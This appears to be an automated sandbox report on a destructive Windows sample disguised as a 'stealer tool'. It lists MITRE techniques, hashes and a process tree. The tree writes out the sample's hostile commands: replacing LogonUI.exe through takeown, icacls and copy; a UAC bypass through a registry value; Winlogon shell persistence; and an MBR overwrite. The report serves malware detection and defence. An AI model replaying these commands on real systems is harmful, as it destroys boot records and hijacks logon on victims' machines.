7089a8179efa6c83ec6cac9f54648e85fb903e56a966c3a5874c5a95a81c3638

Analysis

max time kernel
220s
max time network
204s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
15-08-2024 17:26

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

stealer tool + secret options/ADM Adrenaline Ultimate Edition.exe
Size

15.0MB
MD5

8f5a2b3154aba26acf5440fd3034326c
SHA1

b4d508ee783dc1f1a2cf9147cc1e5729470e773b
SHA256

fc7e799742a1c64361a8a9c3fecdf44f9db85f0bf57f4fb5712519d12ba4c5ac
SHA512

01c052c71a2f97daf76c91765e3ee6ec46ca7cb67b162c2fc668ef5ee35399622496c95568dedffbaf72524f70f6afcfe90f567fbb653a93d800664b046cd5f2
SSDEEP

393216:l2iLiU7VXd6AKprP7iJx4J20cQ3qpalJZfhxGWqIcckC:l2iNObp4x820AS7nj

Score

10^/10

bootkit discovery evasion exploit persistence ransomware trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\""	gdifuncs.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	gdifuncs.exe

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
4376	takeown.exe
3520	icacls.exe
1376	takeown.exe
1612	icacls.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	gdifuncs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	ADM Adrenaline Ultimate Edition.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 4 IoCs

pid	Process
1556	mbr.exe
1488	jeffpopup.exe
4284	bobcreep.exe
3148	gdifuncs.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4376	takeown.exe
3520	icacls.exe
1376	takeown.exe
1612	icacls.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	mbr.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp"	reg.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	\??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe	cmd.exe
File opened for modification	\??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe	cmd.exe
File created	\??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav	cmd.exe
File opened for modification	\??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav	cmd.exe
File created	C:\windows\WinAttr.gci	gdifuncs.exe
File opened for modification	\??\c:\windows\WinAttr.gci	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mbr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jeffpopup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gdifuncs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ADM Adrenaline Ultimate Edition.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bobcreep.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4808	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1588	taskkill.exe

Modifies Control Panel 3 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur"	gdifuncs.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur"	gdifuncs.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur"	gdifuncs.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe
3148	gdifuncs.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	3148	gdifuncs.exe
Token: SeDebugPrivilege	3148	gdifuncs.exe
Token: 33	4016	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4016	AUDIODG.EXE
Token: SeTakeOwnershipPrivilege	4376	takeown.exe
Token: SeTakeOwnershipPrivilege	1376	takeown.exe
Token: SeDebugPrivilege	1588	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1488	jeffpopup.exe
4284	bobcreep.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3056 wrote to memory of 4936	3056	ADM Adrenaline Ultimate Edition.exe	85
PID 3056 wrote to memory of 4936	3056	ADM Adrenaline Ultimate Edition.exe	85
PID 4936 wrote to memory of 1556	4936	wscript.exe	95
PID 4936 wrote to memory of 1556	4936	wscript.exe	95
PID 4936 wrote to memory of 1556	4936	wscript.exe	95
PID 4936 wrote to memory of 4404	4936	wscript.exe	96
PID 4936 wrote to memory of 4404	4936	wscript.exe	96
PID 4404 wrote to memory of 3796	4404	cmd.exe	98
PID 4404 wrote to memory of 3796	4404	cmd.exe	98
PID 4404 wrote to memory of 4056	4404	cmd.exe	99
PID 4404 wrote to memory of 4056	4404	cmd.exe	99
PID 4404 wrote to memory of 4120	4404	cmd.exe	100
PID 4404 wrote to memory of 4120	4404	cmd.exe	100
PID 4404 wrote to memory of 3596	4404	cmd.exe	101
PID 4404 wrote to memory of 3596	4404	cmd.exe	101
PID 4404 wrote to memory of 2724	4404	cmd.exe	102
PID 4404 wrote to memory of 2724	4404	cmd.exe	102
PID 4404 wrote to memory of 1332	4404	cmd.exe	103
PID 4404 wrote to memory of 1332	4404	cmd.exe	103
PID 4404 wrote to memory of 4216	4404	cmd.exe	104
PID 4404 wrote to memory of 4216	4404	cmd.exe	104
PID 4404 wrote to memory of 2164	4404	cmd.exe	105
PID 4404 wrote to memory of 2164	4404	cmd.exe	105
PID 4404 wrote to memory of 4004	4404	cmd.exe	106
PID 4404 wrote to memory of 4004	4404	cmd.exe	106
PID 4404 wrote to memory of 3480	4404	cmd.exe	107
PID 4404 wrote to memory of 3480	4404	cmd.exe	107
PID 4404 wrote to memory of 1132	4404	cmd.exe	108
PID 4404 wrote to memory of 1132	4404	cmd.exe	108
PID 4404 wrote to memory of 2204	4404	cmd.exe	109
PID 4404 wrote to memory of 2204	4404	cmd.exe	109
PID 4404 wrote to memory of 4396	4404	cmd.exe	110
PID 4404 wrote to memory of 4396	4404	cmd.exe	110
PID 4404 wrote to memory of 2572	4404	cmd.exe	111
PID 4404 wrote to memory of 2572	4404	cmd.exe	111
PID 4404 wrote to memory of 1800	4404	cmd.exe	112
PID 4404 wrote to memory of 1800	4404	cmd.exe	112
PID 4404 wrote to memory of 1720	4404	cmd.exe	113
PID 4404 wrote to memory of 1720	4404	cmd.exe	113
PID 4404 wrote to memory of 4444	4404	cmd.exe	114
PID 4404 wrote to memory of 4444	4404	cmd.exe	114
PID 4404 wrote to memory of 4428	4404	cmd.exe	115
PID 4404 wrote to memory of 4428	4404	cmd.exe	115
PID 4404 wrote to memory of 1252	4404	cmd.exe	116
PID 4404 wrote to memory of 1252	4404	cmd.exe	116
PID 4404 wrote to memory of 3112	4404	cmd.exe	117
PID 4404 wrote to memory of 3112	4404	cmd.exe	117
PID 4404 wrote to memory of 2948	4404	cmd.exe	118
PID 4404 wrote to memory of 2948	4404	cmd.exe	118
PID 4404 wrote to memory of 1732	4404	cmd.exe	119
PID 4404 wrote to memory of 1732	4404	cmd.exe	119
PID 4404 wrote to memory of 1644	4404	cmd.exe	120
PID 4404 wrote to memory of 1644	4404	cmd.exe	120
PID 4404 wrote to memory of 2936	4404	cmd.exe	121
PID 4404 wrote to memory of 2936	4404	cmd.exe	121
PID 4404 wrote to memory of 3424	4404	cmd.exe	122
PID 4404 wrote to memory of 3424	4404	cmd.exe	122
PID 4404 wrote to memory of 2288	4404	cmd.exe	123
PID 4404 wrote to memory of 2288	4404	cmd.exe	123
PID 4404 wrote to memory of 2444	4404	cmd.exe	124
PID 4404 wrote to memory of 2444	4404	cmd.exe	124
PID 4404 wrote to memory of 2900	4404	cmd.exe	125
PID 4404 wrote to memory of 2900	4404	cmd.exe	125
PID 4404 wrote to memory of 4484	4404	cmd.exe	126

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	gdifuncs.exe

C:\Users\Admin\AppData\Local\Temp\stealer tool + secret options\ADM Adrenaline Ultimate Edition.exe
"C:\Users\Admin\AppData\Local\Temp\stealer tool + secret options\ADM Adrenaline Ultimate Edition.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3056
- C:\Windows\system32\wscript.exe
  "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A539.tmp\A53A.tmp\A53B.vbs //Nologo
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4936
- - C:\Users\Admin\AppData\Local\Temp\A539.tmp\mbr.exe
    "C:\Users\Admin\AppData\Local\Temp\A539.tmp\mbr.exe"
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A539.tmp\tools.cmd" "
    3⤵
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:4404
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3796
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:4056
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:4120
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3596
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2724
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1332
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:4216
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2164
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:4004
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3480
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1132
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2204
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:4396
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2572
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1800
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1720
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:4444
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:4428
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1252
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3112
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2948
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1732
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1644
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2936
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3424
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2288
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2444
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2900
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:4484
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3648
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:4788
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1148
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1188
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3812
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1288
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:540
- - C:\Users\Admin\AppData\Local\Temp\A539.tmp\jeffpopup.exe
    "C:\Users\Admin\AppData\Local\Temp\A539.tmp\jeffpopup.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1488
- - C:\Users\Admin\AppData\Local\Temp\A539.tmp\bobcreep.exe
    "C:\Users\Admin\AppData\Local\Temp\A539.tmp\bobcreep.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4284
- - C:\Users\Admin\AppData\Local\Temp\A539.tmp\gdifuncs.exe
    "C:\Users\Admin\AppData\Local\Temp\A539.tmp\gdifuncs.exe"
    3⤵
    - Modifies WinLogon for persistence
    - UAC bypass
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Modifies Control Panel
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - System policy modification
    PID:3148
  - - C:\windows\SysWOW64\takeown.exe
      "C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4376
  - - C:\windows\SysWOW64\icacls.exe
      "C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3520
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65&copy "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit
      4⤵
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:4220
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f LogonUI.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls LogonUI.exe /granted "Admin":F
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:1612
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "tobi0a0c.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1588

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4c0 0x31c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A539.tmp\A53A.tmp\A53B.vbs

Filesize
2KB

MD5
a0679dce64fcf875f4208b823d4b85c0

SHA1
85abe3673db82bfe5b2c207dc98648e32afffea0

SHA256
85a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1

SHA512
1e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\A539.tmp\bg.bmp

Filesize
6.6MB

MD5
a605dbeda4f89c1569dd46221c5e85b5

SHA1
5f28ce1e1788a083552b9ac760e57d278467a1f9

SHA256
77897f44096311ddb6d569c2a595eca3967c645f24c274318a51e5346816eb8e

SHA512
e4afa652f0133d51480f1d249c828600d02f024aa2cccfb58a0830a9d0c6ee56906736e6d87554ed25c4e69252536cb7379b60b2867b647966269c965b538610

Download Submit
C:\Users\Admin\AppData\Local\Temp\A539.tmp\bobcreep.exe

Filesize
92KB

MD5
219cd85d93a4ed65a481f353a3de5376

SHA1
a38ab77caf5417765d5595b2fcd859c6354bf079

SHA256
00c9fdc8b877c7fb8365709155ab28cb3dac282ae7ec9fc9d47a78b408e0d13f

SHA512
367644e3bc3310207b5863b09688269c38a55540b8c87e71d66771c954d37d561ed09f3ee11b36c4c8f4a48b618b2e8debae3d93ff684d15305f93a3ade6b3d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\A539.tmp\gdifuncs.exe

Filesize
5.0MB

MD5
c47c6a5111193af2c9337634b773d2d3

SHA1
036604921b67bbad60c7823482e5e6cb268ded14

SHA256
7c4f20624dd062a6c71d845d05c6328d5a903ca96398e2902506591b231ed585

SHA512
56698b7b2edc0f94d0f7172c853cbe67ac682d132df768659ebca0c169091acb36ffd0a6874c26e2fb35117061c91c9eca4312532ba778312e3d63cc77ce1262

Download Submit
C:\Users\Admin\AppData\Local\Temp\A539.tmp\jeffpopup.exe

Filesize
780KB

MD5
4151b988c9d5c550ccb6c3b49bf551d4

SHA1
10ff979be4a5bbacaf208bdbb8236b940208eed1

SHA256
5ec45cc1a109f556d0cd44ba48d3bf11af556ee66dd8b78c94d3ef0e93735e8e

SHA512
c73947b534741c29340550066cd1a6b7cbb4387f3be8303f2d1d0cb21c6f430e0415c27daabc82d32570f421934db78dc840403de18aef09d5a4f0cbe4350e4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\A539.tmp\mainbgtheme.wav

Filesize
19.0MB

MD5
1b185a156cfc1ddeff939bf62672516b

SHA1
fd8b803400036f42c8d20ae491e2f1f040a1aed5

SHA256
e147a3c7a333cbc90e1bf9c08955d191ce83f33542297121635c1d79ecfdfa36

SHA512
41b33930e3efe628dae39083ef616baaf6ceb46056a94ab21b4b67eec490b0442a4211eaab79fce1f75f40ecdc853d269c82b5c5389081102f11e0f2f6503ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\A539.tmp\mbr.exe

Filesize
1.3MB

MD5
74be3afd732dc010c8266326cc32127b

SHA1
a91802c200f10c09ff9a0679c274bbe55ecb7b41

SHA256
03fe34795ad0f91fc8eb8c9ebe8094541e4fb4d7095095f8b48f345c2a6d0f0c

SHA512
68fa03d640680e37614feccb56f4d41180724cb7c08ba25f9bea3830a44c03d635664d8e0255ab2d05d3613498f4a4dd4398b7971a2cb1c9ae3be93f944946e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\A539.tmp\tools.cmd

Filesize
2KB

MD5
288bebe9f904e6fabe4de67bd7897445

SHA1
0587ce2d936600a9eb142c6197fe12a0c3e8472f

SHA256
cf965fcc5a7ca4d9245c706c88b4d5013fb84be27b0ec262facccfadf14bdca2

SHA512
7db8e7c1318bcab7cef2c02484a82f347a630443a644b546a5cc339a5a848d1a3e915255f9c357de6ee26817a55d1091d80e2a8e97f66afa5686b3d11ee56c3c

Download Submit
C:\Users\Admin\Desktop\YOUDIED 5.txt

Filesize
74B

MD5
05d30a59150a996af1258cdc6f388684

SHA1
c773b24888976c889284365dd0b584f003141f38

SHA256
c5e98b515636d1d7b2cd13326b70968b322469dbbe8c76fc7a84e236c1b579c9

SHA512
2144cd74536bc663d6031d7c718db64fd246346750304a8ceef5b58cd135d6ea061c43c9150334ee292c7367ff4991b118080152b8ebc9c5630b6c5186872a3a

Download Submit
memory/1556-221-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/3148-240-0x0000000000210000-0x0000000000712000-memory.dmp

Filesize
5.0MB

Download
memory/3148-241-0x00000000055D0000-0x0000000005B74000-memory.dmp

Filesize
5.6MB

Download
memory/3148-242-0x0000000005100000-0x0000000005192000-memory.dmp

Filesize
584KB

Download
memory/3148-243-0x00000000054C0000-0x00000000054CA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads